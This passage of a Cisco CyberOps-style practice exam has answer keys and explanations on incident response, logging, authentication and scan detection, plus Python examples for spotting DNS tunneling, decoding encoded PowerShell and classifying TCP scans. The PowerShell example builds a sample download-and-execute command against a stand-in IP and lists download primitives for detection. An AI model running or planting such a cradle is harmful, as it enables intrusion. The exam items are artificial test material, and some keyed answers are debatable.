D.Enable SSL/TLS decryption on the corporate firewall to inspect the encrypted traffic.
Answer: A

DNS logs can show resolution of suspicious domains, indicating potential C2 communication.

Why this answer

Option A is correct because correlating DNS logs with encrypted traffic timestamps is the fastest, least intrusive way to confirm whether the host actually communicated with the typosquatted domain. If the DNS query for the lookalike domain resolved just before the encrypted session to the external IP, it strongly indicates the malware is using the typosquatted domain for command-and-control (C2) over HTTPS, bypassing simple domain-based blocklists. This step validates the alert without requiring decryption or assuming user reports are reliable.

Exam trap

Cisco often tests the misconception that encrypted traffic cannot be analyzed at all, leading candidates to choose decryption (Option D) as the first step, when in fact DNS log correlation is a non-disruptive, immediate method to confirm the compromise.

How to eliminate wrong answers

Option B is wrong because user reports are unreliable in compromise scenarios—malware often runs silently without user-visible symptoms, and dismissing the alert based on user feedback ignores the IDS signature and DNS evidence. Option C is wrong because the traffic is encrypted (TLS/SSL), so examining the full packet capture will only show encrypted payloads; without the session keys, you cannot see the plaintext content. Option D is wrong because enabling SSL/TLS decryption on the corporate firewall is a major operational change that requires policy approval, certificate deployment, and may break certificate pinning; it is not a first step and could alert the malware if it checks for interception.

Question 36 (MCQ, medium)

A security analyst is investigating a potential data exfiltration incident. The analyst notices that a server is sending encrypted data to an external IP address during non-business hours. The server is supposed to only communicate with internal systems. What is the best immediate action?

A.Disconnect the server from the network
B.Block the external IP address at the firewall
C.Notify the server's administrator
D.Capture a packet capture (PCAP) of the traffic for analysis
Answer: A

This immediately stops data transfer, preserving evidence and preventing further loss.

Why this answer

Option A is correct because disconnecting the server from the network immediately stops the potential data exfiltration by severing all communication paths. This is the fastest way to contain the threat and prevent further data loss, aligning with the first step in incident response: containment. In a suspected exfiltration scenario, preserving the system state for forensic analysis is secondary to stopping the active data transfer.

Exam trap

Cisco often tests the principle that containment must precede analysis; the trap here is that candidates choose 'Capture a PCAP' (Option D) because they think evidence collection is the first step, but in an active exfiltration, stopping the data loss is the priority.

How to eliminate wrong answers

Option B is wrong because blocking the external IP address at the firewall only prevents traffic to that specific IP, but the server could still be compromised and may attempt to communicate with other external IPs or use alternate protocols (e.g., DNS tunneling) to exfiltrate data. Option C is wrong because notifying the server's administrator introduces unnecessary delay; the immediate priority is containment, not notification, and the administrator may not be available or may inadvertently alert an insider threat. Option D is wrong because capturing a packet capture (PCAP) of the traffic for analysis is a forensic step that should occur after containment; continuing to allow the traffic to flow while capturing could result in further data loss and gives the attacker more time to complete the exfiltration.

Question 37 (MCQ, hard)

A security analyst is responding to an incident on a critical Windows server that hosts a database application. The server is running Windows Server 2019 with all current patches. The analyst suspects that a remote attacker gained access and is using living-off-the-land binaries to move laterally. The analyst has captured a memory dump and a full disk image. The analyst needs to determine if the attacker used PowerShell to download additional tools. Which analysis step should the analyst perform first to identify PowerShell usage?

A.Examine the Windows Registry for Run keys to identify persistence mechanisms.
B.Parse PowerShell operational logs (Event ID 4104) to extract executed scripts and commands.
C.Review prefetch files (.pf) to determine when PowerShell was last executed.
D.Analyze network connection logs to identify outbound connections to known malicious IPs.
Answer: B

PowerShell ScriptBlock logging captures the full script content, directly showing attacker commands.

Why this answer

PowerShell operational logs, specifically Event ID 4104 (Script Block Logging), capture the full text of PowerShell scripts and commands executed on the system. Since the analyst suspects the attacker used PowerShell to download additional tools, parsing these logs is the most direct and efficient first step to confirm that activity. This log source provides the actual commands run, including any download commands like Invoke-WebRequest or Start-BitsTransfer, without relying on indirect artifacts.

Exam trap

Cisco often tests the distinction between artifacts that show execution (prefetch, registry) versus artifacts that capture the actual command or script content (PowerShell operational logs), leading candidates to choose a less direct indicator like prefetch files.

How to eliminate wrong answers

Option A is wrong because examining Windows Registry Run keys focuses on persistence mechanisms (e.g., programs that start automatically), not on identifying whether PowerShell was used to download tools during the incident. Option C is wrong because prefetch files (.pf) only show that PowerShell.exe was launched and when, but they do not reveal the specific commands or scripts executed, so they cannot confirm tool downloads. Option D is wrong because analyzing network connection logs may show outbound connections but does not directly prove PowerShell was the method used; the attacker could have used other tools or protocols, and logs may be incomplete or not capture encrypted traffic.

Question 38 (MCQ, hard)

A company's security policy states that all network traffic must be inspected by an IPS. However, encrypted traffic (SSL/TLS) is bypassing inspection. The network team wants to implement SSL decryption. What is the primary policy consideration before implementing?

A.Configure the firewall to block SSL traffic that cannot be decrypted.
B.Notify all users that their traffic will be inspected.
C.Create a certificate authority to issue certificates to all internal servers.
D.Ensure that the SSL decryption device has enough CPU capacity.
E.Obtain legal approval for decryption of user traffic.
AnswerE

Decryption raises privacy and legal issues.

Why this answer

Option E is correct because legal and policy approval for decrypting user traffic is paramount: TLS inspection exposes user sessions to the organization, which raises privacy, regulatory and contractual questions that must be settled before any technical work begins. Options A, C and D are technical steps that follow approval (what to do with traffic that cannot be decrypted, issuing certificates, sizing the decryption device). Option B, notifying users, is also required in most jurisdictions, but it follows from the approved policy rather than preceding it.

39
MCQeasy

A network administrator is using Cisco ISE to monitor endpoint authentication. Which report provides details on failed authentication attempts and the reasons?

A.RADIUS Authentication Report
B.Endpoint Profiler Report
C.RADIUS Accounting Report
D.Active Session Report
AnswerA

This report includes details of authentication attempts and failure reasons.

Why this answer

The RADIUS Authentication Report in Cisco ISE specifically logs all authentication attempts, including failures, and provides detailed reasons for each failure (e.g., invalid credentials, user not found, or authorization policy mismatch). This report is the primary tool for troubleshooting failed authentications because it captures the RADIUS Access-Reject messages and the corresponding failure reasons from the ISE policy evaluation.

Exam trap

Cisco often tests the distinction between RADIUS Authentication (which captures failures and reasons) and RADIUS Accounting (which tracks session usage), leading candidates to mistakenly choose the Accounting report when asked about failed authentications.

How to eliminate wrong answers

Option B is wrong because the Endpoint Profiler Report focuses on endpoint classification and profiling (e.g., OS, device type) based on probe data, not on authentication success or failure details. Option C is wrong because the RADIUS Accounting Report tracks session start, stop, and interim updates (e.g., traffic usage, session duration), not authentication failures or their reasons. Option D is wrong because the Active Session Report shows currently active authenticated sessions, not historical failed attempts or the reasons for those failures.

40
Multi-Selectmedium

Which TWO incident types must be reported within 1 hour under the company's incident response policy?

Select 2 answers
A.Unauthorized access
B.Malware outbreak
C.Phishing simulation failure
D.Spam campaign
E.Policy violation
AnswersA, B

Unauthorized access is a security breach requiring immediate action.

Why this answer

Option A (unauthorized access) and Option B (malware outbreak) are critical incidents requiring immediate reporting because both indicate an active compromise. Options C, D and E (a failed phishing simulation, a spam campaign and a policy violation) are less severe and may have longer reporting windows.

41
MCQeasy

An organization wants to ensure that security logs are tamper-proof and available for forensic analysis. Which logging best practice should be implemented?

A.Retain logs for only 30 days to reduce storage costs
B.Forward logs to a centralized, hardened log server with access controls
C.Encrypt logs before sending them to a remote server
D.Store logs locally on each device with read-only permissions
AnswerB

Centralization and access controls improve security and forensics.

Why this answer

Option B is correct because sending logs to a centralized, hardened log server with restricted access is the best practice: a copy leaves the device as soon as the event is written, so an attacker who compromises the host cannot quietly alter or delete it, and the central copy is what forensic analysis relies on. Option D is wrong because logs stored locally are under the control of whoever compromises the device; read-only permissions do not stop an administrator-level attacker. Option C is wrong because encryption in transit protects confidentiality but does not by itself prevent tampering or deletion. Option A is wrong because short retention periods hinder forensics.

42
Multi-Selectmedium

An organization is implementing a security policy that requires all remote access to the corporate network to be authenticated using multi-factor authentication (MFA). Which TWO of the following are valid MFA factors?

Select 2 answers
A.IP address whitelist
B.Smart card
C.Password
D.Fingerprint scan
E.Security question
AnswersB, D

Smart card is a possession factor.

Why this answer

Smart card (Option B) is a valid MFA factor because it falls under the 'something you have' category. Multi-factor authentication requires at least two different categories from 'something you know' (e.g., password), 'something you have' (e.g., smart card, token), and 'something you are' (e.g., biometric). A smart card stores a digital certificate and private key, used for cryptographic authentication, typically requiring a PIN (knowledge factor) to unlock it, thus providing two-factor authentication when combined.

Exam trap

Cisco often tests the distinction between authentication factors and access control lists; the trap here is that candidates mistake an IP address whitelist (a security policy control) for an authentication factor, or think a security question counts as a separate factor when it is merely another form of 'something you know'.

43
MCQmedium

A security policy requires that all mobile devices connecting to corporate email must have a screen lock and be able to be remotely wiped. An employee's personal phone is lost. The employee reports the loss immediately. The phone is enrolled in MDM with remote wipe capability. However, the employee has not set a screen lock, violating policy. The phone contains synced email and contacts. What should the security team do?

A.Remotely wipe the phone immediately.
B.Ask the employee to set a screen lock remotely.
C.Accept the risk since the phone is lost and wipe is possible.
D.Report the violation and suspend the employee's email access until compliance.
AnswerA

This prevents unauthorized access to corporate data.

Why this answer

Option A is correct because remote wipe is the most critical action to protect corporate data: the device is out of the organization's control, has no screen lock, and holds synced mail and contacts, so every minute of delay is exposure. Option B is wrong because a screen lock cannot be relied upon once the device is already in someone else's hands. Option C is wrong because it accepts avoidable risk when the wipe is available now. Option D addresses the policy violation, which should be handled afterwards, but suspending email access does nothing for the data already cached on the phone.

44
MCQeasy

You are a SOC analyst for a school district. The district uses a Cisco Firepower NGFW for traffic inspection and a SIEM for log aggregation. A teacher reports that her workstation is slow and unresponsive. You check the SIEM and see that the workstation (IP 10.1.2.10) has been generating thousands of DNS queries to a domain 'badstuff.example.com' over the past hour. The firewall logs show that the workstation also made many outbound connections to IP 203.0.113.50 on port 80. The DNS queries are for various random subdomains of 'badstuff.example.com'. The school's web filter has no policy for this domain. The user is not technical and cannot explain the behavior. What is the most likely cause and the appropriate first action?

A.Run a full antivirus scan on the workstation
B.Isolate the workstation from the network and add the domain to the block list
C.Update the web filter to block the domain and continue monitoring
D.Ignore the alert because DNS tunneling is not a real threat
AnswerB

Isolation stops the DNS tunneling immediately; blocking the domain prevents future connections.

Why this answer

The workstation is generating thousands of DNS queries for random subdomains of 'badstuff.example.com' and making outbound connections to IP 203.0.113.50 on port 80. This behavior is classic DNS tunneling, where an infected host encodes data in DNS queries to bypass security controls. Isolating the workstation stops the immediate threat and data exfiltration, while adding the domain to the block list prevents further communication from other hosts.

A full antivirus scan is insufficient because DNS tunneling malware often evades signature-based detection and requires network containment first.

Exam trap

Cisco often tests the principle that containment (isolation) is the first priority in an active compromise, not remediation (scanning) or policy updates, and that DNS tunneling is a real exfiltration technique, not a false positive.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan is a reactive step that does not stop ongoing data exfiltration; the malware may be unknown to signature databases, and the immediate priority is network containment. Option C is wrong because updating the web filter to block the domain does not address the already-compromised workstation that is actively tunneling data; the host must be isolated to prevent further damage. Option D is wrong because DNS tunneling is a well-documented exfiltration technique (e.g., using TXT or A record queries) and ignoring it could lead to significant data loss; it is a real threat, especially when combined with outbound HTTP connections to a suspicious IP.
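The detection logic behind this question, as an added example that is not part of the original page: a small Python scorer that groups DNS queries by (client, parent zone) and flags clients whose queries to one zone are numerous, almost never repeat a label, and use high-entropy labels, the three traits of the tunnelling described above. The log lines are constructed for the example, and the thresholds are illustrative assumptions, not figures from the page.

```python
import math
from collections import defaultdict

# Constructed sample of "client_ip queried_name" records, modelled on the scenario above.
# 10.1.2.10 issues many queries for random-looking labels under one parent zone;
# 10.1.2.11 is ordinary browsing traffic included for contrast.
SAMPLE_DNS_LOG = """\
10.1.2.10 a8f3k2j9x0.badstuff.example.com
10.1.2.10 zq7m1n4p5r.badstuff.example.com
10.1.2.10 b2c9d8e7f6.badstuff.example.com
10.1.2.10 k3l2m1n0o9.badstuff.example.com
10.1.2.10 w9x8y7z6a5.badstuff.example.com
10.1.2.10 h4g5f6d7s8.badstuff.example.com
10.1.2.11 www.example.com
10.1.2.11 mail.example.com
10.1.2.11 www.example.com
"""


def shannon_entropy(label: str) -> float:
    """Bits of entropy per character; encoded or random labels score near log2(len)."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_query(qname: str) -> tuple:
    """Return (leftmost label, parent zone): 'x.badstuff.example.com' -> ('x', 'badstuff.example.com')."""
    label, _, parent = qname.rstrip(".").partition(".")
    return label, parent or label


def score_dns_log(log_text: str,
                  min_queries: int = 5,
                  min_unique_ratio: float = 0.8,
                  min_entropy: float = 3.0) -> list:
    """Flag (client, zone) pairs whose query mix looks like DNS tunnelling.

    Thresholds are illustrative assumptions; tune them against your own baseline.
    """
    stats = defaultdict(lambda: {"queries": 0, "labels": set(), "entropy": 0.0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, qname = line.split()
        label, zone = split_query(qname)
        s = stats[(client, zone)]
        s["queries"] += 1
        s["labels"].add(label)
        s["entropy"] += shannon_entropy(label)

    findings = []
    for (client, zone), s in stats.items():
        q = s["queries"]
        unique_ratio = len(s["labels"]) / q   # tunnels almost never repeat a label
        avg_entropy = s["entropy"] / q        # encoded chunks look random
        if q >= min_queries and unique_ratio >= min_unique_ratio and avg_entropy >= min_entropy:
            findings.append({"client": client, "zone": zone, "queries": q,
                             "unique_ratio": round(unique_ratio, 2),
                             "avg_entropy": round(avg_entropy, 2)})
    return findings


if __name__ == "__main__":
    for finding in score_dns_log(SAMPLE_DNS_LOG):
        print("tunnelling suspect:", finding)
```

On the constructed log only 10.1.2.10 against badstuff.example.com is reported; the browsing host repeats "www", has low-entropy labels and falls under the query floor. In production the zone grouping should use a public-suffix list rather than the naive "strip the leftmost label" used here, and the query floor should be a per-host baseline rather than a constant.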

45
MCQmedium

A security analyst wants to monitor file creation events on a critical Windows server without installing additional software. Which Windows audit policy should be configured?

A.Audit Detailed Tracking
B.Audit File System
C.Audit Account Logon
D.Audit Process Creation
AnswerB

Audit File System logs file system operations like create, write, delete.

Why this answer

Audit File System policy is the correct choice because it specifically enables auditing of file creation, modification, and deletion events on NTFS volumes. By configuring this policy under Advanced Audit Policy in Windows, the security analyst can monitor file creation events on the critical server without requiring any third-party software, as the events are logged to the Windows Security log with Event ID 4663 ("An attempt was made to access an object"). Two practical caveats: the policy alone produces nothing until a system access control list (SACL) is set on the folders of interest, and a file creation appears as a 4663 whose access mask includes WriteData (or AddFile) rather than as a distinct "file created" event.

Exam trap

Cisco often tests the distinction between 'Audit File System' (file-level operations) and 'Audit Detailed Tracking' (process-level operations), causing candidates to confuse file creation with process creation events.

How to eliminate wrong answers

Option A is wrong because Audit Detailed Tracking focuses on process creation, termination, and handle duplication events (e.g., Event ID 4688), not file creation events. Option C is wrong because Audit Account Logon monitors authentication events against domain controllers or local SAM (e.g., Event ID 4624), not file system operations. Option D is wrong because Audit Process Creation logs when a process is created or starts (Event ID 4688), which does not capture file creation events on the file system.

46
MCQhard

An analyst is reviewing Sysmon logs on a Windows host and sees Event ID 1 (process creation) with a signed parent process but an unsigned child. The child has a CommandLine that includes 'powershell -EncodedCommand'. What is the most likely threat?

A.PowerShell-based malware using encoded commands to evade detection
B.Privilege escalation attempt
C.Process hollowing attack
D.Phishing email attachment
AnswerA

Encoded commands are a common obfuscation technique in PowerShell attacks.

Why this answer

Event ID 1 with a signed parent process and an unsigned child using 'powershell -EncodedCommand' strongly indicates PowerShell-based malware. Attackers use Base64-encoded commands to obfuscate malicious actions and bypass simple string-based detection, as the encoded payload is decoded and executed by PowerShell at runtime. Two details matter for triage: the argument is Base64 over UTF-16LE text, so decoding it as UTF-8 yields garbage, and PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc), so a detection keyed on the literal string 'EncodedCommand' misses most real samples.

Exam trap

Cisco often tests the distinction between execution indicators (like encoded PowerShell commands) and other attack stages (like privilege escalation or process hollowing), leading candidates to confuse a common obfuscation technique with a different attack type.

How to eliminate wrong answers

Option B is wrong because privilege escalation typically involves exploiting vulnerabilities to gain higher privileges, not simply executing an encoded PowerShell command from a signed parent. Option C is wrong because process hollowing replaces the memory of a legitimate process with malicious code, which would not manifest as a child process with an encoded PowerShell command. Option D is wrong because a phishing email attachment is a delivery vector, not a direct threat indicator; the Sysmon log shows execution, not the initial infection method.
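A worked triage routine for the two PowerShell questions above (the 4104 script-block search for download commands, and the Sysmon Event ID 1 command line carrying -EncodedCommand), added here as example code that is not from the original page: it decodes the UTF-16LE Base64 argument behind any prefix of -EncodedCommand and lists the download and execution primitives found in the result. The command line, script, host and path are constructed placeholders, not real indicators.

```python
import base64
import re
from typing import Optional

# Download and execution primitives worth flagging in a decoded script or a 4104 script block.
DOWNLOAD_PRIMITIVES = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|Start-BitsTransfer|DownloadString|"
    r"DownloadFile|Invoke-Expression|iex)\b",
    re.IGNORECASE,
)


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand argument: Base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the script from a 'powershell ... -EncodedCommand <b64>' command line.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
    so the switch is matched by prefix rather than by its full name.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if len(t) >= 2 and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def find_download_primitives(script: str) -> list:
    """Lower-cased, de-duplicated primitives found in a script or 4104 script block."""
    return sorted({m.lower() for m in DOWNLOAD_PRIMITIVES.findall(script)})


def triage_command_line(command_line: str) -> dict:
    """Decode an encoded command line (if any) and report the primitives it uses."""
    script = decode_encoded_command(command_line)
    text = script if script is not None else command_line
    return {
        "encoded": script is not None,
        "script": text,
        "download_primitives": find_download_primitives(text),
    }


# Constructed sample: the script an attacker might hide behind -enc, and a Sysmon-style
# CommandLine built from it (assumed values, not from the page's exhibit).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.50/stage2.ps1')"
SAMPLE_COMMANDLINE = "powershell.exe -NoP -W Hidden -enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(triage_command_line(SAMPLE_COMMANDLINE))
```

The same find_download_primitives call applies unchanged to the ScriptBlockText field of a 4104 event, which is what makes script block logging the more direct source: with it enabled you do not need the command line at all, because PowerShell logs the decoded block itself.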

47
MCQmedium

Which security principle ensures that a user cannot deny having performed an action?

A.Availability
B.Confidentiality
C.Non-repudiation
D.Integrity
AnswerC

Non-repudiation provides undeniable evidence.

Why this answer

Non-repudiation ensures that a user cannot deny having performed an action, typically through cryptographic mechanisms such as digital signatures, supported by audit logs that are themselves tamper-evident. In network security this is implemented with a PKI (Public Key Infrastructure), where a sender signs data with their private key and the receiver verifies the signature with the corresponding public key, providing proof of origin that the signer cannot plausibly deny.

Exam trap

Cisco often tests the distinction between integrity and non-repudiation, where candidates mistakenly choose integrity because they associate hashing with proof of origin, but integrity only verifies data has not changed, not who sent it.

How to eliminate wrong answers

Option A is wrong because availability ensures that systems and data are accessible when needed, often through redundancy and fault tolerance, but it does not prevent denial of actions. Option B is wrong because confidentiality protects data from unauthorized disclosure via encryption or access controls, but it does not provide proof of who performed an action. Option D is wrong because integrity ensures that data has not been altered in transit or at rest, typically via hashing or checksums, but it does not tie an action to a specific user in a non-repudiable way.

48
MCQhard

During incident response, a security analyst reviews a PCAP file and sees TCP packets with only the SYN flag set, followed by RST packets upon receiving a SYN-ACK. No connection is established. Which scanning technique is being used?

A.Half-open scan (SYN scan)
B.FIN scan
C.Christmas tree scan
D.Full connect scan
AnswerA

Half-open scan sends SYN, receives SYN-ACK, then RST to avoid detection.

Why this answer

The described behavior—sending a SYN packet, receiving a SYN-ACK, and immediately replying with an RST—is the hallmark of a half-open (SYN) scan. This technique never completes the three-way handshake, so the target does not log an established connection, making it stealthier than a full connect scan. The RST sent after the SYN-ACK terminates the handshake before it can be fully established, confirming the port is open without creating a full session.

Exam trap

Cisco often tests the distinction between a half-open scan and a full connect scan by focusing on whether the three-way handshake is completed; the trap here is that candidates may confuse the RST sent after SYN-ACK as part of a normal connection teardown, rather than recognizing it as the defining characteristic of a SYN scan that never completes the handshake.

How to eliminate wrong answers

Option B (FIN scan) is wrong because a FIN scan sends a packet with only the FIN flag set, expecting an RST from closed ports and no response from open ports; it does not involve SYN or SYN-ACK exchanges. Option C (Christmas tree scan) is wrong because it sends packets with the FIN, URG, and PSH flags set (a 'lit-up' combination), not just the SYN flag, and relies on different responses from open vs. closed ports per RFC 793. Option D (Full connect scan) is wrong because it completes the full three-way handshake (SYN, SYN-ACK, ACK) before sending an RST to close the connection, whereas the scenario shows an RST sent immediately after the SYN-ACK, before the final ACK.
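The flag-sequence reasoning this question relies on, written out as an added Python example that is not part of the original page: segments of a constructed trace are grouped per scanner, target and port, and each probe is classified from the order of flags exchanged, distinguishing the half-open SYN scan (SYN, SYN-ACK, RST) from a full connect (SYN, SYN-ACK, ACK, teardown), FIN, Christmas tree and NULL probes. The trace, addresses and port choices are constructed for the example.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    """One TCP segment reduced to what scan classification needs."""
    src: str
    dst: str
    target_port: int      # port on the scanned host, whichever direction the segment travels
    flags: frozenset      # subset of {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}


def F(*names: str) -> frozenset:
    return frozenset(names)


def classify_probe(probe: list) -> str:
    """Classify one scanner->target probe of one port from its ordered flag exchange."""
    scanner = probe[0].src
    sent = [p.flags for p in probe if p.src == scanner]
    recv = [p.flags for p in probe if p.src != scanner]
    first = sent[0]

    if first == {"SYN"}:
        if recv and recv[0] == {"SYN", "ACK"}:
            if len(sent) > 1 and sent[1] == {"ACK"}:
                return "full connect scan (handshake completed), port open"
            if len(sent) > 1 and "RST" in sent[1]:
                return "half-open (SYN) scan, port open"
            return "SYN probe, handshake incomplete"
        if recv and recv[0] == {"RST", "ACK"}:
            return "SYN probe, port closed"
        return "SYN probe, no response (filtered)"

    if first == {"FIN", "PSH", "URG"}:
        kind = "Christmas tree scan"
    elif first == {"FIN"}:
        kind = "FIN scan"
    elif first == set():
        kind = "NULL scan"
    else:
        return "unclassified"
    # RFC 793 behaviour: a closed port answers with RST, an open port stays silent.
    if recv and recv[0] == {"RST", "ACK"}:
        return f"{kind}, port closed"
    return f"{kind}, port open|filtered"


def scan_report(packets: list) -> dict:
    """Group segments by (scanner, target, port) and classify each probe."""
    probes = defaultdict(list)
    for p in packets:
        probes[(frozenset({p.src, p.dst}), p.target_port)].append(p)
    report = {}
    for probe in probes.values():
        scanner, target = probe[0].src, probe[0].dst
        report[(scanner, target, probe[0].target_port)] = classify_probe(probe)
    return report


# Constructed trace standing in for the PCAP in the question; addresses are documentation ranges.
SCANNER, TARGET = "198.51.100.7", "10.1.1.1"
CONSTRUCTED_TRACE = [
    Packet(SCANNER, TARGET, 80, F("SYN")),                 # half-open: SYN, SYN-ACK, RST
    Packet(TARGET, SCANNER, 80, F("SYN", "ACK")),
    Packet(SCANNER, TARGET, 80, F("RST")),
    Packet(SCANNER, TARGET, 22, F("SYN")),                 # full connect: SYN, SYN-ACK, ACK, teardown
    Packet(TARGET, SCANNER, 22, F("SYN", "ACK")),
    Packet(SCANNER, TARGET, 22, F("ACK")),
    Packet(SCANNER, TARGET, 22, F("RST", "ACK")),
    Packet(SCANNER, TARGET, 25, F("SYN")),                 # SYN to a closed port: RST-ACK comes back
    Packet(TARGET, SCANNER, 25, F("RST", "ACK")),
    Packet(SCANNER, TARGET, 443, F("FIN", "PSH", "URG")),  # Xmas probe with no reply
    Packet(SCANNER, TARGET, 8080, F("FIN")),               # FIN probe answered with RST: closed
    Packet(TARGET, SCANNER, 8080, F("RST", "ACK")),
]

if __name__ == "__main__":
    for key, verdict in scan_report(CONSTRUCTED_TRACE).items():
        print(key, "->", verdict)
```

The decisive check is the scanner's second segment after SYN-ACK: a bare ACK means the handshake completed (connect scan, and the target's application will see and may log a session), anything carrying RST means it was torn down before completion (half-open). Note that the "RST in sent[1]" test deliberately accepts RST with or without ACK, since stacks differ in how they form the reset.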

49
MCQmedium

Refer to the exhibit. A security analyst observes a SIEM alert and a firewall log. The firewall allowed the traffic. According to the company's security policy, which action should the analyst take first?

A.Check if the firewall blocked the traffic.
B.Investigate the user's recent activity.
C.Ignore the alert as it is a false positive.
D.Create a firewall rule to block the source IP.
AnswerD

Immediate containment by blocking the IP is appropriate.

Why this answer

The correct answer is D because the firewall log shows the traffic was allowed, and the SIEM alert indicates a security event. According to the security policy, the immediate action is to block the source IP to prevent further potential malicious activity. Creating a firewall rule to block the source IP is a direct and effective response to mitigate the threat.

Exam trap

Cisco often tests the candidate's ability to prioritize containment over investigation, leading them to mistakenly choose 'investigate the user's recent activity' instead of immediately blocking the malicious source IP.

How to eliminate wrong answers

Option A is wrong because the firewall log explicitly shows the traffic was allowed, so checking if it was blocked is redundant and wastes time. Option B is wrong because while investigating user activity may be necessary later, the first priority under the security policy is to contain the threat by blocking the source IP. Option C is wrong because the SIEM alert and firewall log together indicate a real security event, not a false positive, so ignoring it would violate security policy.

50
MCQhard

A security team implements an IPS that uses behavioral profiling. Which type of detection method is being used?

A.Heuristic
B.Signature-based
C.Rule-based
D.Anomaly-based
AnswerD

Behavioral profiling defines normal behavior and detects anomalies.

Why this answer

Behavioral profiling establishes a baseline of normal network traffic patterns and then flags deviations from that baseline as potential threats. This is the core mechanism of anomaly-based detection, which identifies malicious activity by comparing observed behavior against a learned model of normal behavior rather than against predefined signatures or rules.

Exam trap

Cisco often tests the distinction between anomaly-based and heuristic detection, where candidates mistakenly choose heuristic because both involve 'behavior' or 'profiling,' but heuristic relies on predefined rules of thumb while anomaly-based relies on a learned baseline of normal behavior.

How to eliminate wrong answers

Option A is wrong because heuristic detection uses algorithms or rules of thumb to identify suspicious behavior based on general characteristics, not by learning and comparing against a baseline of normal behavior. Option B is wrong because signature-based detection relies on predefined patterns (e.g., byte sequences or known exploit payloads) to match known threats, not on behavioral profiling. Option C is wrong because rule-based detection uses static, manually defined rules (e.g., 'if port 445 and SMB traffic, then alert') rather than dynamically learned behavioral baselines.

51
Multi-Selecteasy

An organization's security policy defines acceptable use of corporate email. Which THREE of the following actions are typically prohibited?

Select 3 answers
A.Using email to subscribe to personal newsletters.
B.Emailing the IT support for assistance.
C.Sending personal emails using the corporate account.
D.Forwarding corporate emails to personal external accounts.
E.Using email to send sensitive customer data without encryption.
AnswersC, D, E

Often restricted to incidental use only.

Why this answer

Options C, D, and E are typically prohibited. Option C: personal use of the corporate account is usually restricted to incidental use at most. Option D: forwarding corporate mail to personal external accounts moves data outside the organization's controls and raises data loss risk. Option E: sending sensitive customer data unencrypted violates data protection policy. Option B: emailing IT support is a normal, permitted use. Option A: subscribing to newsletters is often discouraged but not always prohibited, which is why it is not selected here.

52
Multi-Selecthard

Which three steps are part of the network intrusion analysis process according to Cisco best practices?

Select 3 answers
A.Collection
B.Detection
C.Prevention
D.Analysis
E.Remediation
AnswersA, B, D

Collecting data from network sources is the first step.

Why this answer

Collection (A) is correct because the network intrusion analysis process begins with gathering raw data from sources such as NetFlow, syslog, and packet captures (PCAP); this step ensures that all relevant evidence is preserved for what follows. Detection (B) is where that data is matched against signatures, baselines and threat intelligence to surface events of interest, and Analysis (D) is where the analyst reconstructs what happened and determines scope and impact. Prevention (C) and Remediation (E) are adjacent security functions, not steps of the analysis process itself.

Exam trap

Cisco often tests the distinction between the analysis process steps and adjacent security functions (prevention, remediation) to see if candidates confuse the reactive analysis workflow with proactive or corrective actions.

53
Multi-Selecteasy

A security analyst is creating a procedure for responding to a phishing email reported by a user. Which TWO steps should be included?

Select 2 answers
A.Delete the email from the user's inbox remotely.
B.Ask the user to forward the original email to the security team.
C.Immediately block the sender's email address at the gateway.
D.Require the user to change their password.
E.Investigate if any other users received similar emails.
AnswersC, E

Blocking prevents further phishing attempts from that sender.

Why this answer

Blocking the sender at the gateway (C) and investigating whether other users received similar emails (E) are standard initial steps: the first stops further delivery from that sender, the second establishes scope. Asking the user to forward the original email (B) is not the preferred collection method because an inline forward rewrites the headers; the message should be forwarded as an attachment or pulled from the mail store. Deleting the message remotely (A) is not always possible and is not needed before the evidence is captured. A password change (D) is premature without evidence that the user entered credentials.

54
Multi-Selecthard

A company's security policy requires that all changes to firewall rules must be approved by the change advisory board (CAB). Which THREE of the following are valid reasons to bypass this process?

Select 3 answers
A.Removing a rule for a decommissioned application during maintenance.
B.Adding a new server to the DMZ for a planned project.
C.Troubleshooting a network connectivity issue causing downtime.
D.Implementing a temporary rule for a scheduled penetration test.
E.Critical security vulnerability zero-day exploit requiring immediate block.
AnswersC, D, E

Restoring service during an outage is often allowed as an emergency change.

Why this answer

Restoring service during an outage (C), a temporary rule for a scheduled and pre-approved penetration test (D), and an immediate block for a zero-day that is being actively exploited (E) are the common emergency or pre-authorized exceptions; even then the change should be logged and reviewed by the CAB after the fact. Planned additions (B) and the removal of rules for a decommissioned application (A) carry no urgency and should follow standard change management.

55
MCQmedium

During a security incident, a security analyst isolates an affected host and collects a memory dump. According to incident response procedures, what is the next step the analyst should take?

A.Reboot the host to clear any malware from memory
B.Notify the public relations team immediately
C.Restore the host from a known good backup
D.Analyze the memory dump to identify indicators of compromise
AnswerD

Analysis is the logical next step after data collection to determine the cause and extent.

Why this answer

Option D is correct because after containment (isolation) and data collection (memory dump), the next step is analysis to understand scope and impact, and the captured memory is where process lists, network connections, injected code and credentials are found. Option A is wrong because rebooting destroys the very volatile evidence the dump was taken to preserve and may trigger the malware's persistence. Option B is premature before the facts are known. Option C is a recovery step that happens after analysis and eradication.

56
MCQmedium

An analyst reviews the Cisco ASA syslog message shown in the exhibit. What does this entry indicate?

A.A successful HTTP connection from the outside to the inside server
B.A VPN tunnel initiation that was rejected due to authentication failure
C.An attempted connection from an external host to an internal web server that was blocked by the firewall
D.A NAT translation failure for an outbound connection
AnswerC

Correctly describes the denied inbound TCP connection to port 80.

Why this answer

